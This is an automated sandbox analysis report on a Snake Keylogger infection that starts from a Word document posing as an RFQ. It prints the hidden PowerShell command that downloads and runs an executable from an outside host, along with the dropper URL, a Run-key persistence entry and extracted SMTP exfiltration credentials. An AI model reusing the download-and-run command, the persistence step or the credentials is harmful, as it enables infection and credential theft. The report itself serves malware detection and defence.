snakekeylogger | 574ec668750302f0bb7634d757ce2436753a95d6f9610bc227e13abdecbfc6d5

Analysis

max time kernel
279s
max time network
298s
platform
windows10_x64
resource
win10v20210410
submitted
23-07-2021 14:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Specifications_Details_202300_RFQ.doc
Size

238KB
MD5

9efbd937ce6f8fef4ad85ee94d9cfd47
SHA1

d8eb24e90091238e2f6bd204ea67d54c5c4efdb6
SHA256

574ec668750302f0bb7634d757ce2436753a95d6f9610bc227e13abdecbfc6d5
SHA512

86e2b112d30a010096fca79fea0bdbd1c927a7548ea172f8e9d763bcca54216b836ae9edd960d9c844ebd862c48360d4c11ef86d6a3822ebd9e469c8ac3d694e

Score

10^/10

snakekeylogger keylogger persistence spyware stealer

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://easyviettravel.vn/vendor/seld/0A3/Specifications_Details_202300_RFQ.exe

Extracted

Family

snakekeylogger

Credentials

Protocol: smtp
Host:
netjul.xyz
Port:
587
Username:
silyatwo@netjul.xyz
Password:
Q;QcczP{&6=~

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	4092	508	cmd.exe	WINWORD.EXE

Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
stealer keylogger snakekeylogger
Downloads MZ/PE file
Executes dropped EXE 1 IoCs

Processes:

twodark.exe

pid process

4272 twodark.exe
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
4272	twodark.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

twodark.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\chrom = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\chrom\\chrom.exe\""	twodark.exe

Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

36 checkip.dyndns.org
39 freegeoip.app
40 freegeoip.app
Suspicious use of SetThreadContext 1 IoCs

Processes:

twodark.exe

description pid process target process

PID 4208 set thread context of 4272 4208 twodark.exe twodark.exe

flow	ioc
36	checkip.dyndns.org
39	freegeoip.app
40	freegeoip.app

description	pid	process	target process
PID 4208 set thread context of 4272	4208	twodark.exe	twodark.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXE

pid process

4524 PING.EXE
4744 PING.EXE
4968 PING.EXE
2192 PING.EXE
Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

508 WINWORD.EXE
508 WINWORD.EXE

pid	process
4524	PING.EXE
4744	PING.EXE
4968	PING.EXE
2192	PING.EXE

pid	process
508	WINWORD.EXE
508	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exetwodark.exetwodark.exe

pid	process
3872	powershell.exe
3872	powershell.exe
3872	powershell.exe
4356	powershell.exe
4356	powershell.exe
4356	powershell.exe
4560	powershell.exe
4560	powershell.exe
4560	powershell.exe
4800	powershell.exe
4800	powershell.exe
4800	powershell.exe
5020	powershell.exe
5020	powershell.exe
5020	powershell.exe
4208	twodark.exe
4208	twodark.exe
4272	twodark.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exetwodark.exetwodark.exe

description	pid	process
Token: SeDebugPrivilege	3872	powershell.exe
Token: SeDebugPrivilege	4356	powershell.exe
Token: SeDebugPrivilege	4560	powershell.exe
Token: SeDebugPrivilege	4800	powershell.exe
Token: SeDebugPrivilege	5020	powershell.exe
Token: SeDebugPrivilege	4208	twodark.exe
Token: SeDebugPrivilege	4272	twodark.exe

Suspicious use of SetWindowsHookEx 7 IoCs

Processes:

WINWORD.EXE

pid process

508 WINWORD.EXE
508 WINWORD.EXE
508 WINWORD.EXE
508 WINWORD.EXE
508 WINWORD.EXE
508 WINWORD.EXE
508 WINWORD.EXE

pid	process
508	WINWORD.EXE
508	WINWORD.EXE
508	WINWORD.EXE
508	WINWORD.EXE
508	WINWORD.EXE
508	WINWORD.EXE
508	WINWORD.EXE

Suspicious use of WriteProcessMemory 39 IoCs

Processes:

WINWORD.EXEcmd.exepowershell.exetwodark.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process	target process
PID 508 wrote to memory of 4092	508	WINWORD.EXE	cmd.exe
PID 508 wrote to memory of 4092	508	WINWORD.EXE	cmd.exe
PID 4092 wrote to memory of 3872	4092	cmd.exe	powershell.exe
PID 4092 wrote to memory of 3872	4092	cmd.exe	powershell.exe
PID 3872 wrote to memory of 4208	3872	powershell.exe	twodark.exe
PID 3872 wrote to memory of 4208	3872	powershell.exe	twodark.exe
PID 3872 wrote to memory of 4208	3872	powershell.exe	twodark.exe
PID 4208 wrote to memory of 4356	4208	twodark.exe	powershell.exe
PID 4208 wrote to memory of 4356	4208	twodark.exe	powershell.exe
PID 4208 wrote to memory of 4356	4208	twodark.exe	powershell.exe
PID 4356 wrote to memory of 4524	4356	powershell.exe	PING.EXE
PID 4356 wrote to memory of 4524	4356	powershell.exe	PING.EXE
PID 4356 wrote to memory of 4524	4356	powershell.exe	PING.EXE
PID 4208 wrote to memory of 4560	4208	twodark.exe	powershell.exe
PID 4208 wrote to memory of 4560	4208	twodark.exe	powershell.exe
PID 4208 wrote to memory of 4560	4208	twodark.exe	powershell.exe
PID 4560 wrote to memory of 4744	4560	powershell.exe	PING.EXE
PID 4560 wrote to memory of 4744	4560	powershell.exe	PING.EXE
PID 4560 wrote to memory of 4744	4560	powershell.exe	PING.EXE
PID 4208 wrote to memory of 4800	4208	twodark.exe	powershell.exe
PID 4208 wrote to memory of 4800	4208	twodark.exe	powershell.exe
PID 4208 wrote to memory of 4800	4208	twodark.exe	powershell.exe
PID 4800 wrote to memory of 4968	4800	powershell.exe	PING.EXE
PID 4800 wrote to memory of 4968	4800	powershell.exe	PING.EXE
PID 4800 wrote to memory of 4968	4800	powershell.exe	PING.EXE
PID 4208 wrote to memory of 5020	4208	twodark.exe	powershell.exe
PID 4208 wrote to memory of 5020	4208	twodark.exe	powershell.exe
PID 4208 wrote to memory of 5020	4208	twodark.exe	powershell.exe
PID 5020 wrote to memory of 2192	5020	powershell.exe	PING.EXE
PID 5020 wrote to memory of 2192	5020	powershell.exe	PING.EXE
PID 5020 wrote to memory of 2192	5020	powershell.exe	PING.EXE
PID 4208 wrote to memory of 4272	4208	twodark.exe	twodark.exe
PID 4208 wrote to memory of 4272	4208	twodark.exe	twodark.exe
PID 4208 wrote to memory of 4272	4208	twodark.exe	twodark.exe
PID 4208 wrote to memory of 4272	4208	twodark.exe	twodark.exe
PID 4208 wrote to memory of 4272	4208	twodark.exe	twodark.exe
PID 4208 wrote to memory of 4272	4208	twodark.exe	twodark.exe
PID 4208 wrote to memory of 4272	4208	twodark.exe	twodark.exe
PID 4208 wrote to memory of 4272	4208	twodark.exe	twodark.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Specifications_Details_202300_RFQ.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:508

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Documents\frontcheck.bat" "
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4092

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w h Start-BitsTransfer -Source htt`p://easyviettravel.vn/vendor/seld/0A3/Specifications_Details_202300_RFQ.exe -Destination C:\Users\Public\Documents\twodark.exe;C:\Users\Public\Documents\twodark.exe
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3872

C:\Users\Public\Documents\twodark.exe
"C:\Users\Public\Documents\twodark.exe"
4⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4208

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping gooogle.com
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4356

C:\Windows\SysWOW64\PING.EXE
"C:\Windows\system32\PING.EXE" gooogle.com
6⤵
- Runs ping.exe
PID:4524

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping gooogle.com
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4560

C:\Windows\SysWOW64\PING.EXE
"C:\Windows\system32\PING.EXE" gooogle.com
6⤵
- Runs ping.exe
PID:4744

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping gooogle.com
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4800

C:\Windows\SysWOW64\PING.EXE
"C:\Windows\system32\PING.EXE" gooogle.com
6⤵
- Runs ping.exe
PID:4968

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping gooogle.com
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5020

C:\Windows\SysWOW64\PING.EXE
"C:\Windows\system32\PING.EXE" gooogle.com
6⤵
- Runs ping.exe
PID:2192

C:\Users\Admin\AppData\Local\Temp\twodark.exe
C:\Users\Admin\AppData\Local\Temp\twodark.exe
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4272

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
MD5
e33ed3d4cc9b2e5a08ae25747ef47620

SHA1
e2f4cfdd39bcb2eb1c05648a37a3d8536eaf19b7

SHA256
0e7093450fb6bb5201b4291033daf6099881421ab47b122972e0249ef5b45a4f

SHA512
9e990f7ca202c7ecc7a21dd2433055b71bd62f2e524f4702b674316effeb8fa37e891d40f3e6a960380dd7967033c7a7f235e73a3c434e97495e532309b4f95e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\twodark.exe.log
MD5
9e7845217df4a635ec4341c3d52ed685

SHA1
d65cb39d37392975b038ce503a585adadb805da5

SHA256
d60e596ed3d5c13dc9f1660e6d870d99487e1383891437645c4562a9ecaa8c9b

SHA512
307c3b4d4f2655bdeb177e7b9c981ca27513618903f02c120caa755c9da5a8dd03ebab660b56108a680720a97c1e9596692490aede18cc4bd77b9fc3d8e68aa1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
26775a2c4cd16b49fce348873add8b2b

SHA1
0215a1c53f03e8cc2dd2c618b772f6f42be38ccd

SHA256
a7e9973343b953a03bd9ee13e7a704e2e8b5556e4b5ac15a535d6025fd4c2764

SHA512
b73e4d14f4598e537227a7e9870b803777beed387802768635d40a674ec6003a09be62b736315dff4569567f65120eb834b64395311ead7bcb56529ab23ca296

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
1517f2189a3a3bf00de1fbe031c72c8a

SHA1
7764187b2273ce4f3dd21d5d23e3a2aa3ebbbfd5

SHA256
13e1f6e0cd8c5df88f34bfa538a4fc24a664c00158b2ad6e2eefb4141142ffc5

SHA512
faa90b13001e97f95c06956e77e7994d3a7cac33595695267eda24854a8fda17627af7c46bf058ebfc3a8936339e994b531f111cb234a3ee9b351920a2862a70

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
b5fa2fa4fd3df8885f7868fe07a83e02

SHA1
611709a6018c04f3e4f081c6295f6da68e6cc13f

SHA256
7f6c938152ba9e2e2c3f46122a09f92d32aedd09354b75aa28154142cfb7770c

SHA512
b3e6ad34bb0168a47af5bfd0fba6005ae07fbe07a1d0885caf0d095fba5cde3f643c2be3903a6a8e1848ba3e9da2f45594c3248efe08048c40d5ba4a8cd1919f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
83c19fb800cdb6c2dc4ef021b0c0e3de

SHA1
e37072a485a36b2af938caa889bb98a9bcfddacf

SHA256
c32bf0337a8cbf3b2506856f5b3f90d781af2125d80ce27be375332b318ad37b

SHA512
0788aeba7a60941f31006ce11cab31162d0f82fa08579e2cba5d9b927da396f0d34b6bebf850980fe87b81decdbbad17af9d43bea2c80be2b6ca22b9608dd2a7

Download Submit
C:\Users\Admin\AppData\Local\Temp\twodark.exe
MD5
288e4cbacba92f857bfd5cf62692606d

SHA1
21545f749883d4c24b41ef6fe670978acd424dc6

SHA256
7f8a255d199da0a8ba9aff82cc66c1640bd33582fed396cd642502a5acb48233

SHA512
654e18ede445e4b12df571ecdbc8cf2408e34e35da227f469eac6ee3ce31963309a1a68e18b1cb9f9f795d92d89461a86033508e4b99eac86bafee272993f3f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\twodark.exe
MD5
288e4cbacba92f857bfd5cf62692606d

SHA1
21545f749883d4c24b41ef6fe670978acd424dc6

SHA256
7f8a255d199da0a8ba9aff82cc66c1640bd33582fed396cd642502a5acb48233

SHA512
654e18ede445e4b12df571ecdbc8cf2408e34e35da227f469eac6ee3ce31963309a1a68e18b1cb9f9f795d92d89461a86033508e4b99eac86bafee272993f3f1

Download Submit
C:\Users\Public\Documents\frontcheck.bat
MD5
87ccb0ab85a10b4b9a47b2d0ef0f37c9

SHA1
967fb3ca52c787d984e0e08a2675223c45f96644

SHA256
a046e1c4e6ff5c4f5702cb4581042bae2c0633700fe5637e30b96adb0206bafd

SHA512
4d1d4af7bdf3f7ef5dd734e3d41c6b9b67ea675f6587fa4d2dd0475f37b93b1226ae0aa26c9742e132d4b047272881c2f189cb19e82705c218e982d9bb520dc2

Download Submit
memory/508-122-0x00007FF969780000-0x00007FF96A86E000-memory.dmp

Filesize
16.9MB

Download
memory/508-123-0x00007FF967880000-0x00007FF969775000-memory.dmp

Filesize
31.0MB

Download
memory/508-115-0x00007FF94EEB0000-0x00007FF94EEC0000-memory.dmp

Filesize
64KB

Download
memory/508-116-0x00007FF94EEB0000-0x00007FF94EEC0000-memory.dmp

Filesize
64KB

Download
memory/508-117-0x00007FF94EEB0000-0x00007FF94EEC0000-memory.dmp

Filesize
64KB

Download
memory/508-114-0x00007FF94EEB0000-0x00007FF94EEC0000-memory.dmp

Filesize
64KB

Download
memory/508-119-0x00007FF94EEB0000-0x00007FF94EEC0000-memory.dmp

Filesize
64KB

Download
memory/508-118-0x00007FF9702D0000-0x00007FF972DF3000-memory.dmp

Filesize
43.1MB

Download
memory/2192-489-0x0000000000000000-mapping.dmp

Download
memory/3872-274-0x00000118C5840000-0x00000118C5841000-memory.dmp

Filesize
4KB

Download
memory/3872-404-0x00000118C56B6000-0x00000118C56B8000-memory.dmp

Filesize
8KB

Download
memory/3872-392-0x00000118C57E0000-0x00000118C57E1000-memory.dmp

Filesize
4KB

Download
memory/3872-352-0x00000118C5670000-0x00000118C5671000-memory.dmp

Filesize
4KB

Download
memory/3872-260-0x0000000000000000-mapping.dmp

Download
memory/3872-267-0x00000118C56B3000-0x00000118C56B5000-memory.dmp

Filesize
8KB

Download
memory/3872-266-0x00000118C56B0000-0x00000118C56B2000-memory.dmp

Filesize
8KB

Download
memory/3872-265-0x00000118C5640000-0x00000118C5641000-memory.dmp

Filesize
4KB

Download
memory/4092-257-0x0000000000000000-mapping.dmp

Download
memory/4208-411-0x0000000005730000-0x0000000005731000-memory.dmp

Filesize
4KB

Download
memory/4208-495-0x00000000093E0000-0x000000000944E000-memory.dmp

Filesize
440KB

Download
memory/4208-490-0x0000000006CA0000-0x0000000006CE9000-memory.dmp

Filesize
292KB

Download
memory/4208-415-0x0000000005170000-0x0000000005202000-memory.dmp

Filesize
584KB

Download
memory/4208-414-0x0000000005170000-0x0000000005202000-memory.dmp

Filesize
584KB

Download
memory/4208-413-0x00000000053A0000-0x00000000053A1000-memory.dmp

Filesize
4KB

Download
memory/4208-412-0x0000000005230000-0x0000000005231000-memory.dmp

Filesize
4KB

Download
memory/4208-409-0x0000000000950000-0x0000000000951000-memory.dmp

Filesize
4KB

Download
memory/4208-407-0x0000000000000000-mapping.dmp

Download
memory/4272-507-0x0000000005890000-0x0000000005891000-memory.dmp

Filesize
4KB

Download
memory/4272-510-0x00000000057F0000-0x0000000005CEE000-memory.dmp

Filesize
5.0MB

Download
memory/4272-500-0x000000000041FFDE-mapping.dmp

Download
memory/4272-499-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/4356-429-0x0000000007E20000-0x0000000007E21000-memory.dmp

Filesize
4KB

Download
memory/4356-421-0x0000000006BC0000-0x0000000006BC1000-memory.dmp

Filesize
4KB

Download
memory/4356-416-0x0000000000000000-mapping.dmp

Download
memory/4356-447-0x00000000009E3000-0x00000000009E4000-memory.dmp

Filesize
4KB

Download
memory/4356-448-0x00000000009E4000-0x00000000009E6000-memory.dmp

Filesize
8KB

Download
memory/4356-419-0x0000000000FC0000-0x0000000000FC1000-memory.dmp

Filesize
4KB

Download
memory/4356-420-0x0000000006E70000-0x0000000006E71000-memory.dmp

Filesize
4KB

Download
memory/4356-430-0x0000000007C30000-0x0000000007C31000-memory.dmp

Filesize
4KB

Download
memory/4356-422-0x0000000006C60000-0x0000000006C61000-memory.dmp

Filesize
4KB

Download
memory/4356-423-0x0000000006DD0000-0x0000000006DD1000-memory.dmp

Filesize
4KB

Download
memory/4356-428-0x00000000074A0000-0x00000000074A1000-memory.dmp

Filesize
4KB

Download
memory/4356-424-0x00000000009E0000-0x00000000009E1000-memory.dmp

Filesize
4KB

Download
memory/4356-425-0x00000000009E2000-0x00000000009E3000-memory.dmp

Filesize
4KB

Download
memory/4356-426-0x0000000007610000-0x0000000007611000-memory.dmp

Filesize
4KB

Download
memory/4524-431-0x0000000000000000-mapping.dmp

Download
memory/4560-454-0x0000000000CC4000-0x0000000000CC6000-memory.dmp

Filesize
8KB

Download
memory/4560-446-0x0000000000CC2000-0x0000000000CC3000-memory.dmp

Filesize
4KB

Download
memory/4560-445-0x0000000000CC0000-0x0000000000CC1000-memory.dmp

Filesize
4KB

Download
memory/4560-432-0x0000000000000000-mapping.dmp

Download
memory/4560-453-0x0000000000CC3000-0x0000000000CC4000-memory.dmp

Filesize
4KB

Download
memory/4744-450-0x0000000000000000-mapping.dmp

Download
memory/4800-472-0x00000000013C3000-0x00000000013C4000-memory.dmp

Filesize
4KB

Download
memory/4800-469-0x00000000013C2000-0x00000000013C3000-memory.dmp

Filesize
4KB

Download
memory/4800-468-0x00000000013C0000-0x00000000013C1000-memory.dmp

Filesize
4KB

Download
memory/4800-455-0x0000000000000000-mapping.dmp

Download
memory/4800-473-0x00000000013C4000-0x00000000013C6000-memory.dmp

Filesize
8KB

Download
memory/4968-470-0x0000000000000000-mapping.dmp

Download
memory/5020-498-0x0000000001104000-0x0000000001106000-memory.dmp

Filesize
8KB

Download
memory/5020-497-0x0000000001103000-0x0000000001104000-memory.dmp

Filesize
4KB

Download
memory/5020-474-0x0000000000000000-mapping.dmp

Download
memory/5020-488-0x0000000001102000-0x0000000001103000-memory.dmp

Filesize
4KB

Download
memory/5020-487-0x0000000001100000-0x0000000001101000-memory.dmp

Filesize
4KB

Download